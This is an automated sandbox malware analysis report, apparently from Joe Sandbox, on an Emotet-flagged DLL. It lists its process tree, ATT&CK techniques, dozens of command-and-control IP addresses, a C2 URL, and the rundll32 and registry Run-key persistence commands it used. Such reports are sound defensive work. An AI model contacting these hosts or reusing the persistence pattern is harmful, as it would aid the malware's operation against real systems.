                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC28903AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFC28903AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC28909474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC28909474

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890AB50 cpuid 0_2_00007FFC2890AB50
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28904A94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFC28904A94

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.18104890000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.b60000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1fd03f10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.490000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.28e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.222d2e50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.b60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.222d2e50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1fd03f10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.18104890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.28e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.490000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.771127294.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.261854248.0000018104890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.769097156.0000000000490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.415103190.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.415208554.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.260138697.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.261058866.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.261968375.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.268048394.000001FD03F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.262113824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.262654779.00000222D2E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11
                      Registry Run Keys / Startup Folder
                      111
                      Process Injection
                      21
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1
                      DLL Side-Loading
                      11
                      Registry Run Keys / Startup Folder
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory21
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Application Layer Protocol
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)1
                      DLL Side-Loading
                      111
                      Process Injection
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Hidden Files and Directories
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Regsvr32
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32
                      DCSync24
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      File Deletion
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 745034 Sample: gdazhx1EIP.exe Startdate: 13/11/2022 Architecture: WINDOWS Score: 84 40 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->40 42 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->42 44 45 other IPs or domains 2->44 52 Snort IDS alert for network traffic 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected Emotet 2->56 58 C2 URLs / IPs found in malware configuration 2->58 9 loaddll64.exe 3 2->9         started        12 regsvr32.exe 2 2->12         started        signatures3 process4 signatures5 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->60 14 cmd.exe 1 9->14         started        16 rundll32.exe 2 9->16         started        19 regsvr32.exe 2 9->19         started        23 2 other processes 9->23 21 regsvr32.exe 12->21         started        process6 signatures7 25 rundll32.exe 2 14->25         started        46 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->46 28 regsvr32.exe 16->28         started        30 regsvr32.exe 19->30         started        process8 signatures9 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->62 32 regsvr32.exe 1 25->32         started        process10 dnsIp11 36 115.178.55.22, 49698, 80 SIMAYA-AS-IDPTSimayaJejaringMandiriID Indonesia 32->36 38 172.105.115.71, 49699, 8080 LINODE-APLinodeLLCUS United States 32->38 48 System process connects to network (likely due to code injection or exploit) 32->48 50 Creates an autostart registry key pointing to binary in C:\Windows 32->50 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      gdazhx1EIP.dll44%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.18104890000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      19.2.regsvr32.exe.28e0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      3.2.regsvr32.exe.b60000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      5.2.rundll32.exe.222d2e50000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.490000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      0.2.loaddll64.exe.1fd03f10000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://172.105.115.71:8080/lsug/nhhwenwy/qahixm/0%Avira URL Cloudsafe
                      https://172.105.115.71:8080/0%Avira URL Cloudsafe
                      https://112.105.115.71:8080/0%Avira URL Cloudsafe
                      No contacted domains info
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://172.105.115.71:8080/regsvr32.exe, 00000006.00000003.505453836.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.382745999.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.504752110.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769713040.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://112.105.115.71:8080/regsvr32.exe, 00000006.00000003.505190302.000000000053B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.383008257.0000000000533000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505078011.0000000000534000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://172.105.115.71:8080/lsug/nhhwenwy/qahixm/regsvr32.exe, 00000006.00000003.383008257.0000000000533000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505360051.0000000000534000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505078011.0000000000534000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769331647.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769796168.0000000000534000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      172.105.115.71
                      unknownUnited States
                      63949LINODE-APLinodeLLCUStrue
                      188.165.79.151
                      unknownFrance
                      16276OVHFRtrue
                      196.44.98.190
                      unknownGhana
                      327814EcobandGHtrue
                      174.138.33.49
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      36.67.23.59
                      unknownIndonesia
                      17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                      103.41.204.169
                      unknownIndonesia
                      58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                      85.214.67.203
                      unknownGermany
                      6724STRATOSTRATOAGDEtrue
                      83.229.80.93
                      unknownUnited Kingdom
                      8513SKYVISIONGBtrue
                      198.199.70.22
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      93.104.209.107
                      unknownGermany
                      8767MNET-ASGermanyDEtrue
                      186.250.48.5
                      unknownBrazil
                      262807RedfoxTelecomunicacoesLtdaBRtrue
                      209.239.112.82
                      unknownUnited States
                      30083AS-30083-GO-DADDY-COM-LLCUStrue
                      175.126.176.79
                      unknownKorea Republic of
                      9523MOKWON-AS-KRMokwonUniversityKRtrue
                      128.199.242.164
                      unknownUnited Kingdom
                      14061DIGITALOCEAN-ASNUStrue
                      178.238.225.252
                      unknownGermany
                      51167CONTABODEtrue
                      46.101.98.60
                      unknownNetherlands
                      14061DIGITALOCEAN-ASNUStrue
                      190.145.8.4
                      unknownColombia
                      14080TelmexColombiaSACOtrue
                      82.98.180.154
                      unknownSpain
                      42612DINAHOSTING-ASEStrue
                      103.71.99.57
                      unknownIndia
                      135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                      87.106.97.83
                      unknownGermany
                      8560ONEANDONE-ASBrauerstrasse48DEtrue
                      103.254.12.236
                      unknownViet Nam
                      56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                      103.85.95.4
                      unknownIndonesia
                      136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                      202.134.4.210
                      unknownIndonesia
                      7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                      165.22.254.236
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      78.47.204.80
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      118.98.72.86
                      unknownIndonesia
                      7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                      139.59.80.108
                      unknownSingapore
                      14061DIGITALOCEAN-ASNUStrue
                      104.244.79.94
                      unknownUnited States
                      53667PONYNETUStrue
                      37.44.244.177
                      unknownGermany
                      47583AS-HOSTINGERLTtrue
                      51.75.33.122
                      unknownFrance
                      16276OVHFRtrue
                      160.16.143.191
                      unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                      103.56.149.105
                      unknownIndonesia
                      55688BEON-AS-IDPTBeonIntermediaIDtrue
                      85.25.120.45
                      unknownGermany
                      8972GD-EMEA-DC-SXB1DEtrue
                      139.196.72.155
                      unknownChina
                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                      115.178.55.22
                      unknownIndonesia
                      38783SIMAYA-AS-IDPTSimayaJejaringMandiriIDtrue
                      103.126.216.86
                      unknownBangladesh
                      138482SKYVIEW-AS-APSKYVIEWONLINELTDBDtrue
                      128.199.217.206
                      unknownUnited Kingdom
                      14061DIGITALOCEAN-ASNUStrue
                      114.79.130.68
                      unknownIndia
                      45769DVOIS-IND-VoisBroadbandPvtLtdINtrue
                      103.224.241.74
                      unknownIndia
                      133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                      210.57.209.142
                      unknownIndonesia
                      38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                      202.28.34.99
                      unknownThailand
                      9562MSU-TH-APMahasarakhamUniversityTHtrue
                      80.211.107.116
                      unknownItaly
                      31034ARUBA-ASNITtrue
                      54.37.228.122
                      unknownFrance
                      16276OVHFRtrue
                      218.38.121.17
                      unknownKorea Republic of
                      9318SKB-ASSKBroadbandCoLtdKRtrue
                      185.148.169.10
                      unknownGermany
                      44780EVERSCALE-ASDEtrue
                      195.77.239.39
                      unknownSpain
                      60493FICOSA-ASEStrue
                      178.62.112.199
                      unknownEuropean Union
                      14061DIGITALOCEAN-ASNUStrue
                      62.171.178.147
                      unknownUnited Kingdom
                      51167CONTABODEtrue
                      64.227.55.231
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:745034
                      Start date and time:2022-11-13 18:00:18 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 4s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:gdazhx1EIP.exe (renamed file extension from exe to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal84.troj.evad.winDLL@21/2@0/49
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 58.8% (good quality ratio 53.4%)
                      • Quality average: 60.9%
                      • Quality standard deviation: 31.8%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 61
                      • Number of non-executed functions: 170
                      Cookbook Comments:
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 8.238.189.126, 8.241.126.121, 67.26.137.254, 8.238.191.126, 8.248.113.254, 93.184.221.240, 209.197.3.8
                      • Excluded domains from analysis (whitelisted): www.bing.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ocsp.digicert.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      18:02:53API Interceptor2x Sleep call for process: regsvr32.exe modified
                      18:03:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run IhDzTlHldHNg.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll"
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      172.105.115.71UNUy8dUYWp.dllGet hashmaliciousBrowse
                        3sbn8ZI5nn.dllGet hashmaliciousBrowse
                          3sbn8ZI5nn.dllGet hashmaliciousBrowse
                            zzkCIdCoDt.dllGet hashmaliciousBrowse
                              zzkCIdCoDt.dllGet hashmaliciousBrowse
                                U9M1w8FHBW.dllGet hashmaliciousBrowse
                                  En3ZIyuYdw.dllGet hashmaliciousBrowse
                                    Kjx74pqege.dllGet hashmaliciousBrowse
                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                        En3ZIyuYdw.dllGet hashmaliciousBrowse
                                          Kjx74pqege.dllGet hashmaliciousBrowse
                                            mqMIxHWdwe.dllGet hashmaliciousBrowse
                                              i590SBAZAI.dllGet hashmaliciousBrowse
                                                rbh8gbxi93.dllGet hashmaliciousBrowse
                                                  aukDPlAxnc.dllGet hashmaliciousBrowse
                                                    Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                      eki0vpuCvx.dllGet hashmaliciousBrowse
                                                        mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                          i590SBAZAI.dllGet hashmaliciousBrowse
                                                            rbh8gbxi93.dllGet hashmaliciousBrowse
                                                              188.165.79.151UNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                  3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                    zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                        U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                          En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                            Kjx74pqege.dllGet hashmaliciousBrowse
                                                                              U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                  mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                    i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                      rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                        aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                          Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                            eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                              mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                  rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                    aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                      No context
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      LINODE-APLinodeLLCUSUNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.226.75
                                                                                                      i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.226.75
                                                                                                      OVHFRUNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 5.135.247.111
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                      • 94.23.45.86
                                                                                                      i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                      • 94.23.45.86
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62919 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                      Category:dropped
                                                                                                      Size (bytes):62919
                                                                                                      Entropy (8bit):7.995280921994772
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:d+OfVxHl7Wyf11lYom3xQcRVOtPHwQV4rP6Ji7:d+OxHxJlZcuPt4b6q
                                                                                                      MD5:3DCF580A93972319E82CAFBC047D34D5
                                                                                                      SHA1:8528D2A1363E5DE77DC3B1142850E51EAD0F4B6B
                                                                                                      SHA-256:40810E31F1B69075C727E6D557F9614D5880112895FF6F4DF1767E87AE5640D1
                                                                                                      SHA-512:98384BE7218340F95DAE88D1CB865F23A0B4E12855BEB6E74A3752274C9B4C601E493864DB777BCA677A370D0A9DBFFD68D94898A82014537F3A801CCE839C42
                                                                                                      Malicious:false
                                                                                                      Preview:MSCF............,...................I.......Q.........GU.\ .authroot.stl..O..5..CK..<Tk...c_.d....A.K...+.d.-;%.BJII!.QIR..$t)Kd.-QQ*...g......^..~|N=...y....{. .4{...W....b.i...j.I.......1:..b\.0.....Ait.2t......w.%.&.",tL_...4.8L[G..;.57....AT.k.......V..K......(....mzS...G....r.".=H.?>.........x&...S%....X.M^..j...A..x.9`.9...A../.s..#.4#.....Id.w..B....s.8..(...dj....=L.)..s.d.]NxQX8....stV#.K.'7.tH..9u~.2..!..2./.....!..9C../...mP $..../y.....@p.6.}.`...5. 0r.w...@(.. .Q....)g.........m..z*.8rR..).].T9r<.L....0..`.........c.....;-.g..;.wk.)......i..c5.....{v.u...AS..=.....&.:.........+..P.N..9..EAQ.V.$s.......B.`.Mfe..8.......$...y-.q9J........W...2.Q8...O.......i..@\^.=X..dG$.M..#=....m.h..{9.'...-.v..Z...!....z.....N....i..^..,........d...%Xa~q.@D|0...Y.m...........&d.4..A..{t=...../.t.3._.....?-.....uroP?.d.Z..S..{...$.i....X..$.O..4..N.)....U.Z..P....X,.... ...Lg..35..W..s.!c...Ap.].P..8..M..W.......U..,...m.u..|=.m1..~..!..b...._.
                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):328
                                                                                                      Entropy (8bit):3.1108374798811247
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKehN1HlNiN+SkQlPlEGYRMY9z+4KlDA3RUeKlTAlWRyf1:G/kPlE99SNxAhUexYo1
                                                                                                      MD5:7E8432D99C3E675A0B970703245CE46A
                                                                                                      SHA1:1062493A0F10E295E8027BDDD22BE2F9DF3A3485
                                                                                                      SHA-256:A16E46D34FDD97BF2FE6E063F5D7D8A6546BD59FB68737C15F433101675C368A
                                                                                                      SHA-512:B58AE9FE660720AD514D1C82B8A5F2C2D3CA6E124B8E9076A85335004DA1125C33D6B22274FFD7CA33766D7D91EFF73BF144690220484DF260BD56D5EEC60F54
                                                                                                      Malicious:false
                                                                                                      Preview:p...... ..........L....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.d.e.4.d.3.9.b.e.8.d.8.1.:.0."...
                                                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                      Entropy (8bit):6.619145958407103
                                                                                                      TrID:
                                                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                      File name:gdazhx1EIP.dll
                                                                                                      File size:528896
                                                                                                      MD5:6b304d058ae0788762f8924d2cad7ef5
                                                                                                      SHA1:f416b3c02d4f1746f8a642af253ee0d903b7b083
